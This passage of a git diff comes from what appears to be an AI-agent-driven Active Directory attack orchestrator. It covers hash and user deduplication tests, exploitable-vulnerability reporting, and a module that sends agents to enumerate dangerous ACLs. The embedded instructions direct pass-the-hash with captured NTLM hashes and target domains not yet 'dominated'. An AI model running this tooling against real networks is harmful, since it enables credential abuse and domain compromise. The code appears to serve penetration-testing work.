should be folded into the prefixed one. + let hashes = vec![ + make_hash("", "Administrator", "NTLM", "aabbccdd"), + make_hash("contoso.local", "Administrator", "NTLM", "aabbccdd"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, "contoso.local"); +} + +#[test] +fn dedup_hashes_keeps_distinct_users_sharing_hash() { + // Two different users can end up with identical NTLMs (shared password). + // They must NOT be folded together — dedup keys on + // (username, hash_type, hash_value), not just (hash_type, hash_value). + let hashes = vec![ + make_hash("contoso.local", "Administrator", "NTLM", "deadbeefcafe"), + make_hash("contoso.local", "svc_backup", "NTLM", "deadbeefcafe"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 2); +} + +#[test] +fn dedup_hashes_bare_with_no_domain_sibling_kept() { + // If we only ever saw the bare form, we cannot infer a domain — keep it as-is. + let hashes = vec![make_hash("", "Administrator", "NTLM", "aabbccdd")]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, ""); +} + +#[test] +fn dedup_hashes_picks_longest_domain_when_multiple_known() { + // If the same user+hash appears with both a parent and a child domain (rare + // cross-forest replication artifact), prefer the longer/more-specific FQDN + // when filling in a bare entry. + let hashes = vec![ + make_hash("", "krbtgt", "NTLM", "deadbeef"), + make_hash("contoso.local", "krbtgt", "NTLM", "deadbeef"), + make_hash("child.contoso.local", "krbtgt", "NTLM", "deadbeef"), + ]; + let deduped = dedup_hashes(&hashes); + // The bare entry folds into the longest sibling; the two populated entries stay distinct. + assert_eq!(deduped.len(), 2); + let domains: Vec<&str> = deduped.iter().map(|h| h.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"child.contoso.local")); +} + +#[test] +fn dedup_hashes_drops_ghost_machine_accounts() { + let hashes = vec![ + make_hash( + "contoso.local", + "WIN-4D75DLR6UCC$", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:da118ed665879916ceaacfb98e3ee74e", + ), + make_hash("contoso.local", "admin", "NTLM", "aabb"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].username, "admin"); +} + +#[test] +fn dedup_users_drops_ghost_machine_accounts() { + let nb = HashMap::new(); + let mut ghost = make_user("contoso.local", "WIN-BJAK8XUNHGD$"); + ghost.source = "kerberos_enum".to_string(); + let mut real = make_user("contoso.local", "jdoe"); + real.source = "kerberos_enum".to_string(); + let users = vec![ghost, real]; + let deduped = dedup_users(&users, &nb); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].username, "jdoe"); +} diff --git a/ares-cli/src/dedup/users.rs b/ares-cli/src/dedup/users.rs index c8087de8..9bd4abdc 100644 --- a/ares-cli/src/dedup/users.rs +++ b/ares-cli/src/dedup/users.rs @@ -2,7 +2,7 @@ use std::collections::HashMap; use ares_core::models::User; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; /// Noise usernames that should be filtered. pub(super) const NOISE_USERNAMES: &[&str] = &[ @@ -81,6 +81,7 @@ pub(crate) fn dedup_users(users: &[User], netbios_to_fqdn: &HashMap, exploited: &HashSet, @@ -303,20 +308,57 @@ fn print_vulnerabilities( return; } - let mut vulns: Vec<(&String, &VulnerabilityInfo)> = discovered.iter().collect(); - vulns.sort_by(|a, b| { - a.1.priority - .cmp(&b.1.priority) - .then(a.1.vuln_type.cmp(&b.1.vuln_type)) - }); + let mut exploitable: Vec<(&String, &VulnerabilityInfo)> = Vec::new(); + let mut findings: Vec<(&String, &VulnerabilityInfo)> = Vec::new(); + for (id, vuln) in discovered.iter() { + if vuln.priority <= EXPLOITABLE_PRIORITY_MAX { + exploitable.push((id, vuln)); + } else { + findings.push((id, vuln)); + } + } + let sort_vulns = |vulns: &mut Vec<(&String, &VulnerabilityInfo)>| { + vulns.sort_by(|a, b| { + a.1.priority + .cmp(&b.1.priority) + .then(a.1.vuln_type.cmp(&b.1.vuln_type)) + }); + }; + sort_vulns(&mut exploitable); + sort_vulns(&mut findings); + + let exploited_in_exploitable = exploitable + .iter() + .filter(|(id, _)| exploited.contains(*id)) + .count(); - println!("Discovered Vulnerabilities ({}):", vulns.len()); + println!( + "Exploitable Vulnerabilities ({}, {} exploited):", + exploitable.len(), + exploited_in_exploitable + ); + if exploitable.is_empty() { + println!(" (none)"); + } else { + print_vuln_table(&exploitable, exploited); + } + println!(); + + println!("Findings ({}):", findings.len()); + if !findings.is_empty() { + print_vuln_table(&findings, exploited); + } + println!(); +} + +/// Render a single vulnerability table body (header + rows). +fn print_vuln_table(vulns: &[(&String, &VulnerabilityInfo)], exploited: &HashSet) { println!( " {:<30} {:<20} {:>8} {:>9} Details", "Type", "Target", "Priority", "Exploited" ); println!(" {}", "-".repeat(100)); - for (vuln_id, vuln) in &vulns { + for (vuln_id, vuln) in vulns { let is_exploited = exploited.contains(*vuln_id); let exploited_mark = if is_exploited { "\u{2713}" } else { "\u{2717}" }; @@ -336,7 +378,6 @@ fn print_vulnerabilities( vuln.vuln_type, vuln.target, vuln.priority, exploited_mark, details_display ); } - println!(); } /// Format vulnerability details HashMap into a readable string. @@ -422,10 +463,12 @@ fn print_attack_path(timeline_events: &[serde_json::Value]) { .and_then(|v| v.as_str()) .unwrap_or("unknown event"); + let already_critical = description.starts_with("CRITICAL:"); let desc_lower = description.to_lowercase(); - let is_critical = desc_lower.contains("krbtgt") - || (desc_lower.contains("administrator") && desc_lower.contains("hash")) - || desc_lower.contains("domain admin"); + let is_critical = !already_critical + && (desc_lower.contains("krbtgt") + || (desc_lower.contains("administrator") && desc_lower.contains("hash")) + || desc_lower.contains("domain admin")); let prefix = if is_critical { "CRITICAL: " } else { "" }; let mitre = extract_mitre_from_event(event); diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs index 6571c836..ad710096 100644 --- a/ares-cli/src/orchestrator/automation/acl.rs +++ b/ares-cli/src/orchestrator/automation/acl.rs @@ -5,9 +5,9 @@ use std::time::Duration; use serde_json::json; use tokio::sync::watch; -use tracing::{info, warn}; +use tracing::{debug, info, warn}; -use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome}; use crate::orchestrator::state::*; /// Extract steps from an ACL chain JSON value. @@ -141,29 +141,45 @@ pub async fn auto_acl_chain_follow( }); let priority = dispatcher.effective_priority("acl_abuse"); - match dispatcher - .throttled_submit("acl_chain_step", "acl", payload, priority) + // Mark dedup on Submitted OR Deferred — Deferred means the task is + // safely in the deferred ZSET and the drain will retry it. Without + // this, the next 30s tick re-emits the same step and the deferred + // ZSET hits its per-type cap, silently dropping work. + let mark_dedup = match dispatcher + .throttled_submit_outcome("acl_chain_step", "acl", payload, priority) .await { - Ok(Some(task_id)) => { + Ok(SubmissionOutcome::Submitted(task_id)) => { info!( task_id = %task_id, step_key = %dedup_key, "ACL chain step dispatched" ); - // Mark as dispatched in both in-memory set and dedup - { - let mut state = dispatcher.state.write().await; - state.dispatched_acl_steps.insert(dedup_key.clone()); - state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone()); - } - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key) - .await; + true + } + Ok(SubmissionOutcome::Deferred) => { + debug!(step_key = %dedup_key, "ACL chain step deferred (will retry via deferred drain)"); + true + } + Ok(SubmissionOutcome::Dropped) => { + debug!(step_key = %dedup_key, "ACL chain step dropped (will reconsider next tick)"); + false + } + Err(e) => { + warn!(err = %e, "Failed to dispatch ACL chain step"); + false + } + }; + if mark_dedup { + { + let mut state = dispatcher.state.write().await; + state.dispatched_acl_steps.insert(dedup_key.clone()); + state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone()); } - Ok(None) => {} // deferred or throttled - Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"), + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key) + .await; } } } @@ -174,6 +190,8 @@ mod tests { use super::*; use serde_json::json; + // --- extract_chain_steps --- + #[test] fn extract_chain_steps_from_array() { let chain = json!([{"source": "a"}, {"source": "b"}]); @@ -213,6 +231,8 @@ mod tests { assert!(extract_chain_steps(&chain).is_none()); } + // --- extract_source_user --- + #[test] fn extract_source_user_from_source_key() { let step = json!({"source": "admin"}); @@ -249,6 +269,8 @@ mod tests { assert_eq!(extract_source_user(&step), ""); } + // --- extract_source_domain --- + #[test] fn extract_source_domain_from_source_domain_key() { let step = json!({"source_domain": "contoso.local"}); @@ -279,6 +301,8 @@ mod tests { assert_eq!(extract_source_domain(&step), ""); } + // --- acl_step_dedup_key --- + #[test] fn acl_step_dedup_key_basic() { assert_eq!(acl_step_dedup_key(0, 0), "chain:0:step:0"); diff --git a/ares-cli/src/orchestrator/automation/acl_discovery.rs b/ares-cli/src/orchestrator/automation/acl_discovery.rs new file mode 100644 index 00000000..7a75814c --- /dev/null +++ b/ares-cli/src/orchestrator/automation/acl_discovery.rs @@ -0,0 +1,812 @@ +//! auto_acl_discovery -- discover ACL attack paths via targeted LDAP queries. +//! +//! Bridges the gap between BloodHound collection and ACL exploitation. +//! BloodHound collects data, but the ACL chain analysis must be extracted +//! and registered as discovered_vulnerabilities for `auto_dacl_abuse` to +//! exploit. +//! +//! This module dispatches `ldap_acl_enumeration` tasks per domain to: +//! 1. Query nTSecurityDescriptor on user/group/computer objects +//! 2. Identify dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, +//! GenericWrite, WriteOwner, Self-Membership) +//! 3. Register discovered ACL paths as vulnerabilities +//! +//! Interval: 60s (heavy LDAP query, don't run too frequently). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// The dangerous ACE types we want the recon agent to identify. +const DANGEROUS_ACE_TYPES: &[&str] = &[ + "GenericAll", + "GenericWrite", + "WriteDacl", + "WriteOwner", + "ForceChangePassword", + "Self-Membership", + "WriteMember", + "AllExtendedRights", + "WriteProperty", +]; + +/// Collect ACL discovery work items from current state. +/// +/// Pure logic extracted from `auto_acl_discovery` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_acl_discovery_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip dominated domains — once we own a domain there is nothing left + // for ACL escalation to discover there. Cross-trust ACL paths against + // un-owned domains still fire (they iterate other entries in + // all_domains_with_dcs). + if state.dominated_domains.contains(domain) { + continue; + } + // Use separate dedup keys for cred vs hash attempts so a failed + // password-based attempt (e.g., mislabeled credential domain) + // doesn't permanently block the hash-based path. + let dedup_key_cred = format!("acl_disc:{}:cred", domain.to_lowercase()); + let dedup_key_hash = format!("acl_disc:{}:hash", domain.to_lowercase()); + let dedup_key_trust = format!("acl_disc:{}:trust", domain.to_lowercase()); + + // Prefer same-domain cleartext cred, then fall back to trust-compatible + // cred (child→parent or cross-forest). Trust-based attempts use a + // separate dedup key so they don't block hash-based fallback. + let (cred, using_trust_cred) = if !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_cred) + { + let c = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + (c, false) + } else { + (None, false) + }; + let (cred, using_trust_cred) = + if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_trust) { + match state.find_trust_credential(domain) { + Some(c) => (Some(c), true), + None => (None, using_trust_cred), + } + } else { + (cred, using_trust_cred) + }; + + // Look for NTLM hash (PTH) — fires independently of cred attempt + let (ntlm_hash, ntlm_hash_username) = + if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_hash) { + state + .hashes + .iter() + .find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.username.to_lowercase() == "administrator" + }) + .or_else(|| { + state.hashes.iter().find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&h.username) + }) + }) + .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone()))) + .unwrap_or((None, None)) + } else { + (None, None) + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + continue; + } + + let dedup_key = if ntlm_hash.is_some() { + dedup_key_hash + } else if using_trust_cred { + dedup_key_trust + } else { + dedup_key_cred + }; + + // Collect known users in this domain to check ACEs against. + let domain_users: Vec = state + .credentials + .iter() + .filter(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .map(|c| c.username.clone()) + .collect(); + + items.push(AclDiscoveryWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain: domain.clone(), + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + known_users: domain_users, + ntlm_hash, + ntlm_hash_username, + }); + } + + items +} + +/// Dispatches LDAP ACE enumeration per domain to discover ACL attack paths. +/// Only runs after BloodHound collection has been dispatched (to avoid +/// duplicating effort). +pub async fn auto_acl_discovery(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + info!("auto_acl_discovery: spawned, waiting 45s for initial recon"); + + // Wait for initial recon to populate domain controllers. + tokio::time::sleep(Duration::from_secs(45)).await; + + info!("auto_acl_discovery: initial wait complete, entering main loop"); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("acl_discovery") { + debug!("auto_acl_discovery: technique not allowed"); + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + let dcs = state.all_domains_with_dcs(); + let creds = state.credentials.len(); + let hashes = state.hashes.len(); + info!( + dc_count = dcs.len(), + creds, hashes, "auto_acl_discovery: tick" + ); + collect_acl_discovery_work(&state) + }; + + if work.is_empty() { + debug!("auto_acl_discovery: no work items"); + } else { + info!( + count = work.len(), + "auto_acl_discovery: work items collected" + ); + } + + for item in work { + // When PTH hash is available, use the hash user's identity for the target domain + let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() { + ( + item.ntlm_hash_username + .clone() + .unwrap_or_else(|| item.credential.username.clone()), + String::new(), + item.domain.clone(), + ) + } else { + ( + item.credential.username.clone(), + item.credential.password.clone(), + item.credential.domain.clone(), + ) + }; + let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_acl_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, + }, + "ace_types": DANGEROUS_ACE_TYPES, + "known_users": item.known_users, + "instructions": concat!( + "Enumerate ACL attack paths in this domain.\n\n", + "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ", + "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n", + " - Use ldap_search with the hash if it accepts one, OR\n", + " - Use rpcclient_command with the hash parameter to query DACLs via RPC.\n\n", + "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain, ", + "you MUST pass bind_domain= to ldap_search. ", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain.\n\n", + "If a password IS provided, use ldap_search with filter ", + "'(objectCategory=*)' and request the nTSecurityDescriptor attribute.\n\n", + "For each dangerous ACE found (GenericAll, WriteDacl, ForceChangePassword, ", + "GenericWrite, WriteOwner, Self-Membership on users/groups), register it as ", + "a vulnerability with EXACTLY these fields:\n", + " vuln_type: lowercase ACE type (e.g. 'forcechangepassword', 'genericall', ", + "'genericwrite', 'writedacl', 'writeowner', 'self_membership')\n", + " source: the user/group that HAS the permission (attacker)\n", + " target: the user/group/computer that is the TARGET (victim)\n", + " target_type: 'User', 'Group', or 'Computer'\n", + " domain: the domain where this ACE exists\n", + " source_domain: the domain of the source principal\n", + "Focus on ACEs where the source is a user we have credentials for.\n\n", + "IMPORTANT: Include ALL users discovered in the discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"acl_discovery\"}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + // ACL discovery is high-priority — it gates RBCD, shadow creds, + // and DACL abuse exploitation paths. Use priority 2 to compete + // with credential_access tasks rather than sitting behind them. + let priority = 2; + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + known_users = item.known_users.len(), + "ACL discovery dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ACL_DISCOVERY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ACL_DISCOVERY, &item.dedup_key) + .await; + } + Ok(None) => { + // Don't mark dedup on defer — the deferred queue will + // retry and we need the work item to remain eligible in + // case the deferred task never dispatches. Duplicate + // enqueues to the deferred queue are harmless (it dedupes + // by payload hash). + debug!(domain = %item.domain, "ACL discovery deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch ACL discovery"); + } + } + } + } +} + +struct AclDiscoveryWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + known_users: Vec, + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::Credential; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key_cred = format!("acl_disc:{}:cred", "contoso.local"); + let key_hash = format!("acl_disc:{}:hash", "contoso.local"); + assert_eq!(key_cred, "acl_disc:contoso.local:cred"); + assert_eq!(key_hash, "acl_disc:contoso.local:hash"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ACL_DISCOVERY, "acl_discovery"); + } + + #[test] + fn dangerous_ace_types_not_empty() { + assert!(!DANGEROUS_ACE_TYPES.is_empty()); + } + + #[test] + fn dangerous_ace_types_contains_key_types() { + assert!(DANGEROUS_ACE_TYPES.contains(&"GenericAll")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteDacl")); + assert!(DANGEROUS_ACE_TYPES.contains(&"ForceChangePassword")); + assert!(DANGEROUS_ACE_TYPES.contains(&"GenericWrite")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteOwner")); + assert!(DANGEROUS_ACE_TYPES.contains(&"Self-Membership")); + } + + #[test] + fn dangerous_ace_types_count() { + assert_eq!(DANGEROUS_ACE_TYPES.len(), 9); + } + + #[test] + fn dangerous_ace_types_includes_write_property() { + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteProperty")); + assert!(DANGEROUS_ACE_TYPES.contains(&"AllExtendedRights")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteMember")); + } + + #[test] + fn dangerous_ace_types_no_duplicates() { + let mut seen = std::collections::HashSet::new(); + for ace in DANGEROUS_ACE_TYPES { + assert!(seen.insert(*ace), "Duplicate ACE type: {ace}"); + } + } + + #[test] + fn dedup_key_case_normalized() { + let key1 = format!("acl_disc:{}", "CONTOSO.LOCAL".to_lowercase()); + let key2 = format!("acl_disc:{}", "contoso.local"); + assert_eq!(key1, key2); + } + + #[test] + fn acl_discovery_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_acl_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + "ace_types": DANGEROUS_ACE_TYPES, + "known_users": ["admin", "jdoe"], + }); + assert_eq!(payload["technique"], "ldap_acl_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + let ace_types = payload["ace_types"].as_array().unwrap(); + assert_eq!(ace_types.len(), 9); + } + + #[test] + fn credential_domain_preference() { + // Same-domain credential is preferred + let domain = "contoso.local"; + let cred_same = "contoso.local"; + let cred_other = "fabrikam.local"; + assert_eq!(cred_same.to_lowercase(), domain.to_lowercase()); + assert_ne!(cred_other.to_lowercase(), domain.to_lowercase()); + } + + #[test] + fn known_users_collection() { + let credentials = [ + ("admin", "contoso.local"), + ("jdoe", "contoso.local"), + ("admin", "fabrikam.local"), + ]; + let domain = "contoso.local"; + let domain_users: Vec<&str> = credentials + .iter() + .filter(|(_, d)| d.to_lowercase() == domain.to_lowercase()) + .map(|(u, _)| *u) + .collect(); + assert_eq!(domain_users.len(), 2); + assert!(domain_users.contains(&"admin")); + assert!(domain_users.contains(&"jdoe")); + } + + #[test] + fn acl_discovery_work_fields() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = AclDiscoveryWork { + dedup_key: "acl_disc:contoso.local:cred".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + known_users: vec!["admin".into(), "jdoe".into()], + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.known_users.len(), 2); + assert_eq!(work.domain, "contoso.local"); + } + + // --- collect_acl_discovery_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + assert!(work[0].known_users.contains(&"admin".to_string())); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_but_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:trust".into()); + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Add cross-domain cred first, then same-domain cred + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only a fabrikam credential available for contoso DC — should NOT fall back + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Credential with empty password + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_uses_next() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + state + .credentials + .push(make_credential("haspw", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "haspw"); + } + + #[test] + fn collect_known_users_only_from_same_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("jdoe", "Pass!456", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].known_users.len(), 2); + assert!(work[0].known_users.contains(&"admin".to_string())); + assert!(work[0].known_users.contains(&"jdoe".to_string())); + assert!(!work[0].known_users.contains(&"crossuser".to_string())); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + } + + #[test] + fn collect_all_empty_password_creds_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "", "contoso.local")); + state + .credentials + .push(make_credential("user2", "", "fabrikam.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_same_domain_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + // No same-domain cred (quarantined) and no hash → skip + let work = collect_acl_discovery_work(&state); + assert_eq!( + work.len(), + 0, + "quarantined same-domain cred should 